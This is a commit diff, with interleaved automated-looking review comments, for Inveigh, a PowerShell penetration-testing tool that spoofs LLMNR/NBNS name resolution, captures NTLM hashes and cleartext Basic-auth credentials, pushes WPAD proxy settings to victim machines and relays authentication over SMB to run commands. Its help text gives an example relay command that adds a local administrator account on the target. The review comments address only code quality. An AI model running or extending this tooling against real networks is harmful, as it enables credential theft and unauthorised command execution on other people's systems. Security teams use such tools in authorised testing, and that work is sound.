authorKevin Robertson <robertsonk@gmail.com>2016-01-12 11:01:35 -0500
committerKevin Robertson <robertsonk@gmail.com>2016-01-12 11:01:35 -0500
commit5cbec815b38e6efe0ea5ad2d8706506ddd7e398e (patch)
treeb57bbec707e5d20acd31a9984179ce7f6a189e2c
parenta4fce4bbfc0960d50a7df8244dde05d9de6ed9ab (diff)
Spoofer, HTTP/HTTPS, and WPAD additions/changes1.0.0
LLMNR/NBNS spoofer: SpooferIPsReply/SpooferIPsIgnore - These parameters provide granular control over what systems to respond to when spoofing. SpooferHostsReply/SpooferHostsIgnore - These parameters provide granular control over what requested hostnames to respond to when spoofing. Note that SpooferHostsAccept replaces SpoofList. SpooferRepeat - This parameter replaces Repeat in order to sync the parameter name with the prefix used for other spoofer parameters. HTTP/HTTPS Listener: HTTPAuth - This parameter provides the ability to set the HTTP/HTTPS non-WPAD auth to NTLM, Basic, or Anonymous. Basic authentication can be used to capture cleartext credentials (thanks @xorrior!). HTTPBasicRealm - Set a realm name if Basic auth is enabled. HTTPDir/HTTPDefaultFile/HTTPDefaultEXE/HTTPResponse - These parameters provide control over the content served by the listener. HTTPSCertThumbprint - This parameter provides the ability to more easily set the thumbprint for custom certs. HTTP/HTTPS requests are now reported and/or logged. WPAD: WPADIP/WPADPort - These parameters provide the ability to configure a proxy server on victim systems through WPAD. WPADResponse - This parameter provides the ability to configure a custom wpad.dat response rather than the basic one used by WPADIP and WPADPort. WPADAuth - This parameter provides the ability to set the HTTP/HTTPS WPAD auth to NTLM, Basic, or Anonymous. Basic authentication can be used to capture cleartext credentials (thanks @xorrior!). Note that this parameter replaces ForceWPADAuth. Miscellaneous: Get-InveighCleartext - Gets all captured cleartext credentials. Inspect - This switch parameter serves as an easier way to inspect LLMNR/NBNS traffic. If -Inspect is added to the command line, LLMNR, NBNS, HTTP, HTTPS, and SMB are disabled.
-rw-r--r--README.md14
-rw-r--r--Scripts/Inveigh-Relay.ps1108
-rw-r--r--Scripts/Inveigh.ps1537
3 files changed, 492 insertions, 167 deletions
diff --git a/README.md b/README.md
index ef23ec4..561e069 100644
--- a/README.md
+++ b/README.md
@@ -37,7 +37,7 @@ To load and execute with one line:
Import-Module ./Inveigh.ps1;Invoke-Inveigh
To execute with features enabled/disabled:
-Invoke-Inveigh -IP 'local IP' -SpoofIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path'
+Invoke-Inveigh -IP 'local IP' -SpooferIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path'
To execute with SMB relay enabled through Invoke-Inveigh:
Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target"
@@ -51,6 +51,7 @@ Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters
Invoke-Inveigh - Start Inveigh with or without parameters
Invoke-InveighRelay - SMB relay function
Get-Inveigh - Get queued console output
+Get-InveighCleartext - Get all captured cleartext credentials
Get-InveighLog - Get log entries
Get-InveighNTLM - Get all captured challenge/response hashes
Get-InveighNTLMv1 - Get captured NTLMv1 challenge/response hashes
@@ -60,9 +61,18 @@ Watch-Inveigh - Enable real time console output
Clear-Inveigh - Clear Inveigh data from memory
Stop-Inveigh - Stop all running Inveigh functions
+# Included In
+PowerShell Empire - https://github.com/PowerShellEmpire/Empire
+PS>Attack - https://github.com/jaredhaight/psattack
+
+# Special Thanks
+Anyone that posted .net packet sniffing examples.
+Responder - https://github.com/SpiderLabs/Responder
+Impacket - https://github.com/CoreSecurity/impacket
+
# Screenshots
Invoke-Inveigh execution with real time console and file output enabled
-![inveigh1](https://cloud.githubusercontent.com/assets/5897462/10326306/98bb11da-6c67-11e5-8c58-c9ed1107ec19.png)
+![inveighv1](https://cloud.githubusercontent.com/assets/5897462/12239354/4bb8a01a-b856-11e5-8a1e-5c0ebbb1ff35.PNG)
Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2
![inveigh2](https://cloud.githubusercontent.com/assets/5897462/10326313/abde41d8-6c67-11e5-91b8-0c55271ba326.png)
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index 848a683..47a487c 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -8,21 +8,24 @@ Invoke-InveighRelay is the main Inveigh SMB relay function. Invoke-InveighRelay
Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB relay with psexec style command execution.
.PARAMETER HTTP
-Default = Enabled: Enable/Disable HTTP challenge/response capture.
+Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
.PARAMETER HTTPS
-Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
+.PARAMETER HTTPSCertThumbprint
+Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be inveigh.pfx.
+
.PARAMETER Challenge
Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.
Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target.
.PARAMETER MachineAccounts
-Default = Disabled: Enable/Disable showing NTLM challenge/response captures from machine accounts.
+Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-.PARAMETER ForceWPADAuth
-Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts.
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
.PARAMETER SMBRelayTarget
IP address of system to target for SMB relay.
@@ -34,35 +37,35 @@ Command to execute on SMB relay target.
Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
.PARAMETER SMBRelayAutoDisable
-Default = Enable: Automaticaly disable SMB relay after a successful command execution on target.
+Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
.PARAMETER SMBRelayNetworkTimeout
-Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
+Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
.PARAMETER ConsoleOutput
-Default = Disabled: Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
+Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
.PARAMETER FileOutput
-Default = Disabled: Enable/Disable real time file output.
+Default = Disabled: (Y/N) Enable/Disable real time file output.
.PARAMETER StatusOutput
-Default = Enabled: Enable/Disable statup and shutdown messages.
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
.PARAMETER OutputStreamOnly
Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams.
Note that you will not see the various yellow warning messages if enabled.
.PARAMETER OutputDir
-Default = Working Directory: Set an output directory for log and capture files.
+Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
.PARAMETER ShowHelp
-Default = Enabled: Enable/Disable the help messages at startup.
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
.PARAMETER Tool
-Default = 0: Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
.EXAMPLE
-Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2015 /add && net localgroup administrators Dave /add"
+Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Winter2016 /add && net localgroup administrators Dave /add"
Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target.
.EXAMPLE
@@ -77,24 +80,29 @@ https://github.com/mubix/post-exploitation/blob/master/scripts/mass_mimikatz/pow
https://github.com/Kevin-Robertson/Inveigh
#>
+
+# Default parameter values can be modified in this section
param
(
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTP="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTPS="N",
- [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$FileOutput="N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$OutputStreamOnly="N",
- [parameter(Mandatory=$true)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="",
- [parameter(Mandatory=$false)][array]$SMBRelayUsernames,
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y",
- [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$MachineAccounts="N",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="",
- [parameter(Mandatory=$true)][string]$SMBRelayCommand = "",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][string]$WPADAuth="NTLM",
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y"
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="",
+ [parameter(Mandatory=$true)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="",
+ [parameter(Mandatory=$false)][array]$SMBRelayUsernames="",
+ [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="",
+ [parameter(Mandatory=$true)][string]$SMBRelayCommand = "",
+ [parameter(Mandatory=$false)][string]$HTTPSCertThumbprint="76a49fd27011cf4311fb6914c904c90a89f3e4b2",
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
if ($invalid_parameter)
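Review bot: `[array]$SMBRelayUsernames=""` on the new line does not give an empty array; PowerShell coerces the scalar into a one-element array whose only element is the empty string, so `.Count` is 1 and a `-contains ""` test succeeds. The `if($SMBRelayUsernames)` check later in this file is still false for that default (a single-element array takes the truthiness of its element), but any consumer that keys on `.Count` or iterates the list — the relay scriptblock is outside this diff, so I cannot confirm — would see a bogus empty username. Declaring it as `[parameter(Mandatory=$false)][array]$SMBRelayUsernames=@(),` keeps the "no filter" default unambiguous.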
@@ -106,8 +114,7 @@ if(!$SMBRelayTarget)
{
Throw "You must specify an -SMBRelayTarget if enabling -SMBRelay"
}
-
-if(!$SMBRelayCommand)
+elseif(!$SMBRelayCommand)
{
Throw "You must specify an -SMBRelayCommand if enabling -SMBRelay"
}
@@ -131,6 +138,11 @@ if(!$inveigh)
$inveigh.SMBRelay_failed_list = @()
}
+if($inveigh.relay_running)
+{
+ Throw "Invoke-InveighRelay is already running, use Stop-Inveigh"
+}
+
if($inveigh.HTTP_listener.IsListening)
{
$inveigh.HTTP_listener.Stop()
@@ -144,7 +156,7 @@ if(!$inveigh.running)
$inveigh.log_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
- $inveigh.certificate_thumbprint = "76a49fd27011cf4311fb6914c904c90a89f3e4b2"
+ $inveigh.certificate_thumbprint = $HTTPSCertThumbprint
$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
$inveigh.console_output = $false
$inveigh.console_input = $true
@@ -152,7 +164,7 @@ if(!$inveigh.running)
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
- $Inveigh.challenge = $Challenge
+ $inveigh.challenge = $Challenge
}
$inveigh.relay_running = $true
@@ -254,14 +266,7 @@ if(!$inveigh.running)
$inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null
}
- if($ForceWPADAuth -eq 'y')
- {
- $inveigh.status_queue.add("Force WPAD Authentication Enabled")|Out-Null
- }
- else
- {
- $inveigh.status_queue.add("Force WPAD Authentication Disabled")|Out-Null
- }
+ $inveigh.status_queue.add("Force WPAD Authentication = $WPADAuth")|Out-Null
if($ConsoleOutput -eq 'y')
{
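Review bot: The status text still reads `Force WPAD Authentication = $WPADAuth` although the option was renamed from the boolean ForceWPADAuth to a mode selector, so the line will print "Force WPAD Authentication = Anonymous". `$inveigh.status_queue.add("WPAD Authentication = $WPADAuth")|Out-Null` matches the other "Name = value" status lines and the new parameter name.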
@@ -295,17 +300,15 @@ if(!$inveigh.running)
$inveigh.status_queue.add("SMB Relay Enabled") |Out-Null
$inveigh.status_queue.add("SMB Relay Target = $SMBRelayTarget")|Out-Null
-if($SMBRelayUsernames.Count -gt 0)
+if($SMBRelayUsernames)
{
- $SMBRelayUsernames_output = $SMBRelayUsernames -join ","
-
if($SMBRelayUsernames.Count -eq 1)
{
- $inveigh.status_queue.add("SMB Relay Username = $SMBRelayUsernames_output")|Out-Null
+ $inveigh.status_queue.add("SMB Relay Username = " + $SMBRelayUsernames -join ",")|Out-Null
}
else
{
- $inveigh.status_queue.add("SMB Relay Usernames = $SMBRelayUsernames_output")|Out-Null
+ $inveigh.status_queue.add("SMB Relay Usernames = " + $SMBRelayUsernames -join ",")|Out-Null
}
}
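Review bot: Binary `-join` binds looser than `+` in PowerShell, so `"SMB Relay Usernames = " + $SMBRelayUsernames -join ","` on the new lines is parsed as `("SMB Relay Usernames = " + $SMBRelayUsernames) -join ","`: the array is stringified through `$OFS` (a space by default) before the join runs on an already-single string, and the status line loses its comma separators in exactly the multi-username branch that needs them. The removed `$SMBRelayUsernames_output = $SMBRelayUsernames -join ","` had the evaluation order right; parenthesize instead, `$inveigh.status_queue.add("SMB Relay Usernames = " + ($SMBRelayUsernames -join ","))|Out-Null`, and the same on the single-username line.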
@@ -907,7 +910,7 @@ $SMB_relay_execute_scriptblock =
# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
$HTTP_scriptblock =
{
- param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$MachineAccounts,$ForceWPADAuth)
+ param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$MachineAccounts,$WPADAuth)
Function NTLMChallengeBase64
{
@@ -968,8 +971,7 @@ $HTTP_scriptblock =
$HTTP_type = "HTTP"
}
-
- if (($inveigh.request.RawUrl -match '/wpad.dat') -and ($ForceWPADAuth -eq 'n'))
+ if (($inveigh.request.RawUrl -match '/wpad.dat') -and ($WPADAuth -eq 'Anonymous'))
{
$inveigh.response.StatusCode = 200
}
@@ -988,6 +990,9 @@ $HTTP_scriptblock =
if ($HTTP_request_bytes[8] -eq 1)
{
+ $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)])
+
if(($inveigh.SMB_relay) -and ($inveigh.SMB_relay_active_step -eq 0) -and ($inveigh.request.RemoteEndpoint.Address -ne $SMBRelayTarget))
{
$inveigh.SMB_relay_active_step = 1
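Review bot: The two added lines build the identical log message twice, including two separate `Get-Date` calls, so the console and log-file entries for one request can carry different timestamps and the string has to be maintained in two places. Build it once, `$HTTP_request_log = "$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address`, then pass `$HTTP_request_log` to both `console_queue.add` and `log_file_queue.add`. Worth a comment that `RawUrl` is copied verbatim from the client request into the console and the log file, so anything consuming Inveigh-Log.txt should treat that field as untrusted text. The enclosing `$HTTP_scriptblock` begins and ends outside this hunk.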
@@ -1100,7 +1105,7 @@ $HTTP_scriptblock =
}
}
- if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat))
+ if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat))
{
$inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
}
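Review bot: `$inveigh.spoofer_repeat` is read here and in the matching hunk at 1131, but nothing in this file's diff assigns it, and Invoke-InveighRelay has no SpooferRepeat parameter; if the relay script is run on its own rather than through Invoke-Inveigh the property is presumably `$null`, `!$inveigh.spoofer_repeat` is always true, and every capturing client is added to `IP_capture_list` regardless of the intended repeat setting — worth confirming against Invoke-Inveigh's status section, which is not in view. If that is the intended standalone behaviour, a comment such as `# spoofer_repeat is only set by Invoke-Inveigh; standalone relay treats it as disabled` would stop the next reader from chasing it.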
@@ -1126,7 +1131,7 @@ $HTTP_scriptblock =
}
- if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat))
+ if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat))
{
$inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
}
@@ -1270,7 +1275,7 @@ Function HTTPListener()
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument(
$SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument(
$SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument(
- $MachineAccounts).AddArgument($ForceWPADAuth) > $null
+ $MachineAccounts).AddArgument($WPADAuth) > $null
$HTTP_handle = $HTTP_powershell.BeginInvoke()
}
@@ -1526,11 +1531,11 @@ Function Get-InveighNTLMv1
Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes.
.PARAMETER Unique
- Default = Disabled: Enable/Disable displaying only the first captured challenge/response for each unique account.
+ Display only the first captured challenge/response for each unique account.
#>
param
(
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Unique="N",
+ [parameter(Mandatory=$false)][switch]$Unique,
[parameter(ValueFromRemainingArguments=$true)] $invalid_parameter
)
@@ -1539,7 +1544,7 @@ Function Get-InveighNTLMv1
throw "$($invalid_parameter) is not a valid parameter."
}
- if($Unique -eq 'y')
+ if($Unique)
{
$inveigh.NTLMv1_list.sort()
@@ -1568,11 +1573,11 @@ Function Get-InveighNTLMv2
Get-InveighNTLMv2 will get captured NTLMv1 challenge/response hashes.
.PARAMETER Unique
- Default = Disabled: Enable/Disable displaying only the first captured challenge/response for each unique account.
+ Display only the first captured challenge/response for each unique account.
#>
param
(
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Unique="N",
+ [parameter(Mandatory=$false)][switch]$Unique,
[parameter(ValueFromRemainingArguments=$true)] $invalid_parameter
)
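Review bot: The `.SYNOPSIS` context line directly above the edited `.PARAMETER Unique` text still says "Get-InveighNTLMv2 will get captured NTLMv1 challenge/response hashes", a copy-paste leftover from Get-InveighNTLMv1 that this docstring edit leaves in place. Since the help block is being touched anyway, change it to `Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes.`.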
@@ -1581,7 +1586,7 @@ Function Get-InveighNTLMv2
throw "$($invalid_parameter) is not a valid parameter."
}
- if($Unique -eq 'y')
+ if($Unique)
{
$inveigh.NTLMv2_list.sort()
@@ -1618,6 +1623,7 @@ Function Get-InveighStats
.SYNOPSIS
Get-InveighLog will get log.
#>
+ Write-Output("Total Cleartext Captures = " + $inveigh.cleartext_list.count)
Write-Output("Total NTLMv1 Captures = " + $inveigh.NTLMv1_list.count)
Write-Output("Total NTLMv2 Captures = " + $inveigh.NTLMv2_list.count)
}
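Review bot: The new `$inveigh.cleartext_list.count` line assumes the list exists, but the only hunk in this file that touches the `if(!$inveigh)` initialization (around line 138) ends at `$inveigh.SMBRelay_failed_list = @()` without adding `cleartext_list`; that member is created only in Inveigh.ps1's initializer in this diff. When Invoke-InveighRelay is loaded and run before Invoke-Inveigh, this copy of Get-InveighStats would read a missing property — on PowerShell 3+ `$null.count` yields 0, on 2.0 an empty value — so the count would silently be wrong rather than fail. Adding `$inveigh.cleartext_list = New-Object System.Collections.ArrayList` to the relay script's initializer next to the NTLMv2 list keeps the two entry points consistent.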
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index 3112a75..5bdf528 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -14,43 +14,82 @@ Specify a specific local IP address for listening. This IP address will also be
.PARAMETER SpooferIP
Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host.
+.PARAMETER SpooferHostsReply
+Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferHostsIgnore
+Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferIPsReply
+Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferIPsIgnore
+Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferRepeat
+Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
+
.PARAMETER LLMNR
-Default = Enabled: Enable/Disable LLMNR spoofing.
+Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
.PARAMETER NBNS
-Default = Disabled: Enable/Disable NBNS spoofing.
+Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
.PARAMETER NBNSTypes
Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
-.PARAMETER Repeat
-Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
-
-.PARAMETER SpoofList
-Default = All: Comma separated list of hostnames to spoof with LLMNR and NBNS.
-
.PARAMETER HTTP
-Default = Enabled: Enable/Disable HTTP challenge/response capture.
+Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
.PARAMETER HTTPS
-Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store.
+.PARAMETER HTTPAuth
+Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests.
+
+.PARAMETER HTTPBasicRealm
+Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
+
+.PARAMETER HTTPDir
+Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener. This parameter will not be used if HTTPResponse is set.
+
+.PARAMETER HTTPDefaultFile
+Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests.
+
+.PARAMETER HTTPDefaultEXE
+Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
+
+.PARAMETER HTTPResponse
+Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
+
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts.
+
+.PARAMETER HTTPSCertThumbprint
+Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named inveigh.pfx.
+
+.PARAMETER WPADIP
+Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort.
+
+.PARAMETER WPADPort
+Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP.
+
+.PARAMETER WPADResponse
+Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set.
+
.PARAMETER SMB
-Default = Enabled: Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server.
-Block TCP ports 445/139 if you need to prevent login requests from being processed by the Inveigh host.
+Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server.
+Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host.
.PARAMETER Challenge
-Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.
+Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures.
.PARAMETER MachineAccounts
-Default = Disabled: Enable/Disable showing NTLM challenge/response captures from machine accounts.
-
-.PARAMETER ForceWPADAuth
-Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts.
+Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
.PARAMETER SMBRelay
-Default = Disabled: Enable/Disable SMB relay.
+Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory.
.PARAMETER SMBRelayTarget
IP address of system to target for SMB relay.
@@ -62,35 +101,38 @@ Command to execute on SMB relay target.
Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format.
.PARAMETER SMBRelayAutoDisable
-Default = Enable: Automaticaly disable SMB relay after a successful command execution on target.
+Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target.
.PARAMETER SMBRelayNetworkTimeout
-Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
+Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
.PARAMETER ConsoleOutput
-Default = Disabled: Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
+Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell.
.PARAMETER FileOutput
-Default = Disabled: Enable/Disable real time file output.
+Default = Disabled: (Y/N) Enable/Disable real time file output.
.PARAMETER StatusOutput
-Default = Enabled: Enable/Disable statup and shutdown messages.
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
.PARAMETER OutputStreamOnly
-Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams.
+Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams.
Note that you will not see the various yellow warning messages if enabled.
.PARAMETER OutputDir
-Default = Working Directory: Set an output directory for log and capture files.
+Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled.
.PARAMETER ShowHelp
-Default = Enabled: Enable/Disable the help messages at startup.
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
.PARAMETER RunTime
-Set the run time duration in minutes.
+(Integer) Set the run time duration in minutes.
+
+.PARAMETER Inspect
+(Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic.
.PARAMETER Tool
-Default = 0: Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire
.EXAMPLE
Import-Module .\Inveigh.psd1;Invoke-Inveigh
@@ -105,11 +147,14 @@ Invoke-Inveigh -IP 192.168.1.10 -HTTP N
Execute specifying a specific local listening/spoofing IP and disabling HTTP challenge/response.
.EXAMPLE
-Invoke-Inveigh -Repeat N -ForceWPADAuth N -SpoofList host1,host2
+Invoke-Inveigh -Repeat N -WPADAuth Anonymous -SpooferHostsReply host1,host2 -SpooferIPsReply 192.168.2.75,192.168.2.76
Execute with the stealthiest options.
+Invoke-Inveigh -Inspect
+Execute with LLMNR, NBNS, SMB, HTTP, and HTTPS disabled in order to only inpect LLMNR/NBNS traffic.
+
.EXAMPLE
